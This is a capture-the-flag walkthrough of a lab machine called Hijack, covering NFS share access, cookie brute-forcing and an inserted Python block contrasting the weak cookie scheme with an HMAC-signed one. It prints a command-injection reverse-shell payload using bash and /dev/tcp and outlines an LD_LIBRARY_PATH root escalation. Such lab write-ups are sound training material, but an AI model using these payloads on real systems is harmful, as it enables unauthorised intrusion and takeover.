HIJACK

Link: Hijack
Enumeration
- An NMAP scan reveals that a number of services are running on the open ports of the system.

- The services of interest are FTP on port 21, SSH on port 22, HTTP on port 80 and NFS on port 2049. From the NMAP results, FTP does not allow anonymous login. Let's take a look at the website on port 80.

- The website has an admin panel that cannot be accessed because you do not have the rights to do so. You can run a gobuster scan to find out whether there are hidden directories on the website.

- The results of the gobuster scan show that there are no hidden directories of interest. One of the services running on the target machine is NFS. You can list the shares on the target using the command;

- There is only one share on the system, which you can mount on your machine and search for any helpful information that could allow you to access the target.


- You cannot access the mounted share since you are not the owner. You can see that the share is owned by the user hj_1003. This means that you will have to create the user hj_1003 on your system and switch to that user so that you can access the share. You can do so using the command;
sudo adduser hj_1003
and then set the password using the command;
passwd hj_1003

- Now switch to this user and view the contents of the share.

- You get FTP credentials which you can now use to log into FTP.

- There are two files of interest here: .passwords_list.txt and from_admin.txt

- The contents of the latter file reveal that the admin is using one of the passwords from the list. It also reveals that there is another user known as rick. With this information, it's time to pay another visit to the website and play around with it.
- Trying to log into the website using the username admin and the password admin reveals that a user with this name exists but the password is incorrect. Trying this multiple times using default passwords reveals that you only have 5 tries before the system locks you out for 300 seconds.
- You can now try and create a user account to see if there are any parameters, such as cookies, that are present for a user.

- You find that there is indeed a cookie for the user that is logged in. Examining this cookie reveals that it is encoded in base64. By decoding it, it can be seen that the cookie is in the format user:password, where the password is hashed in MD5.

- With the password wordlist obtained from FTP, you can now brute-force the admin cookie using Intruder in Burp Suite. Reload the logged-in page of the user you created, capture the request in Proxy, send it to Intruder and add the wordlist as well as the payload-processing rules. For the cookie to be created, the password is hashed in MD5, the username is appended to this and then the result is encoded in base64. The rules should reflect this in exactly this order.
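The cookie scheme above is why the brute force works: the value is fully determined by the username and password, with no server-side secret or randomness, so every candidate can be computed offline and checked against the lockout-free cookie path. The following added example (not part of the original write-up or the room) shows the weak scheme beside a detection check and a hardened, HMAC-signed session cookie; it assumes the "user:md5(password)" layout, since the page describes the field order in two ways.

```python
import base64
import hashlib
import hmac
import re
import secrets

# Weak scheme as described in the walkthrough (field order is an assumption):
# cookie = base64("user:" + md5hex(password)). Deterministic and unsalted.
def weak_cookie(username: str, password: str) -> str:
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()

WEAK_RE = re.compile(r"^([A-Za-z0-9_.-]+):([0-9a-f]{32})$")

def decode_weak_cookie(cookie: str):
    """Detection check: if a cookie decodes to 'user:<md5 hex>', return the
    (user, md5hex) pair, else None. Any cookie matching this shape leaks the
    username and an unsalted password hash and can be reproduced offline."""
    try:
        decoded = base64.b64decode(cookie, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    m = WEAK_RE.match(decoded)
    return (m.group(1), m.group(2)) if m else None

# Hardened scheme: a random session id bound to the user and signed with a
# server-side key. Nothing derived from the password leaves the server.
SERVER_KEY = secrets.token_bytes(32)  # constructed for this example; a real app persists it

def issue_session(username: str, key: bytes = SERVER_KEY) -> str:
    sid = secrets.token_hex(16)  # fresh per login, so cookies are not reusable across sessions
    payload = f"{username}:{sid}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return base64.b64encode(payload + b":" + tag.encode()).decode()

def verify_session(cookie: str, key: bytes = SERVER_KEY):
    """Return the username if the cookie carries a valid tag, else None."""
    try:
        username, sid, tag = base64.b64decode(cookie, validate=True).decode().rsplit(":", 2)
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(key, f"{username}:{sid}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so tag checking does not leak timing information.
    return username if hmac.compare_digest(tag, expected) else None
```

Note that a forged cookie for another username fails verification without the server key, whereas under the weak scheme the admin cookie is just one MD5 and one base64 away from the password list.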

- Click on the result whose response length or time differs from the rest. This is the cookie for the admin panel.

- Now you can log into the account you created and change the cookie to this value. You now have access to the admin panel, where you can check the status of a service.

- While here, you can try to inject a command that gives you a reverse shell. I tried using a semi-colon after inputting ftp but the system detected this as a command injection. The other option is to use &&, where the second command is executed only after the first has completed. With this, you can perform command injection as follows to get a reverse shell;
ftp && bash -c "bash -i >& /dev/tcp/ip/port 0>&1"
where ip is your listening IP and port is your netcat listening port. Executing this gives you a shell.
- Viewing the contents of config.php reveals credentials for the user rick, which you can use to SSH in.
- Now, you can get your first flag.

Privilege Escalation
- Now, let's try to gain a root shell. The first vector I usually try is sudo -l. Luckily, that gets you a relevant vector for privesc in this case.

- You can leverage the LD_LIBRARY_PATH environment variable to gain a root shell. This is outlined well here.
- The steps are as shown below. Copy the code provided into a C file (shell.c). Compile the code as shown, then run it and append the sudo command that rick is allowed to run on the system.

- This gives you a root shell through which you can get the second flag.
